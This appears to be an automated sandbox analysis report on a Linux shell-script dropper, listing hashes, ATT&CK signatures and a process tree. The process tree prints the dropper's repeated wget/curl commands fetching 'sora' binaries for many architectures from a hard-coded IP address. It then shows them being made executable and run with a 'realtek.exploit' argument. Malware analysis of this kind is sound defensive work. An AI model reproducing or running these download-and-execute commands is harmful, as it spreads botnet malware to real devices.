Analysis
-
max time kernel
20s -
max time network
22s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 02:36
Static task
static1
Behavioral task
behavioral1
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
-
Size
2KB
-
MD5
2a963ff4fb99086ab454f4f26acf8b74
-
SHA1
0830412185a29f4230a85d8f6eb4d15f2a165aea
-
SHA256
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1
-
SHA512
7317b366deb9f38c93b54f2b7e877c2b33bb864f26e49d356446c16292f76fcf7005c5ff4540e8551f5c80c13e5964137d9f545744ce309a24016733244f01d1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 774 chmod 780 chmod 830 chmod 768 chmod 786 chmod 804 chmod 792 chmod 798 chmod 810 chmod 818 chmod 824 chmod 675 chmod 756 chmod 762 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 676 robben /tmp/robben 757 robben /tmp/robben 763 robben /tmp/robben 769 robben /tmp/robben 775 robben /tmp/robben 781 robben /tmp/robben 787 robben /tmp/robben 793 robben /tmp/robben 799 robben /tmp/robben 805 robben /tmp/robben 811 robben /tmp/robben 819 robben /tmp/robben 825 robben /tmp/robben 831 robben -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 754 curl 755 cat 678 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Processes
-
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh1⤵
- Writes file to tmp directory
PID:643 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:645
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:672
-
-
/bin/catcat sora.x862⤵PID:674
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:675
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:676
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:678
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:754
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:755
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:757
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:759
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
PID:760
-
-
/bin/catcat sora.x86_642⤵PID:761
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:763
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:765
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
PID:766
-
-
/bin/catcat sora.i4682⤵PID:767
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:769
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:771
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
PID:772
-
-
/bin/catcat sora.i6862⤵PID:773
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:775
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:777
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
PID:778
-
-
/bin/catcat sora.mpsl2⤵PID:779
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:781
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:783
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
PID:784
-
-
/bin/catcat sora.arm42⤵PID:785
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:787
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:789
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:790
-
-
/bin/catcat sora.arm52⤵PID:791
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:793
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:795
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:796
-
-
/bin/catcat sora.arm62⤵PID:797
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:799
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:801
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:802
-
-
/bin/catcat sora.arm72⤵PID:803
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:805
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:807
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:808
-
-
/bin/catcat sora.ppc2⤵PID:809
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:811
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:813
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
PID:814
-
-
/bin/catcat sora.ppc440fp2⤵PID:817
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:819
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:821
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
PID:822
-
-
/bin/catcat sora.m68k2⤵PID:823
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:825
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:827
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
PID:828
-
-
/bin/catcat sora.sh42⤵PID:829
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:831
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1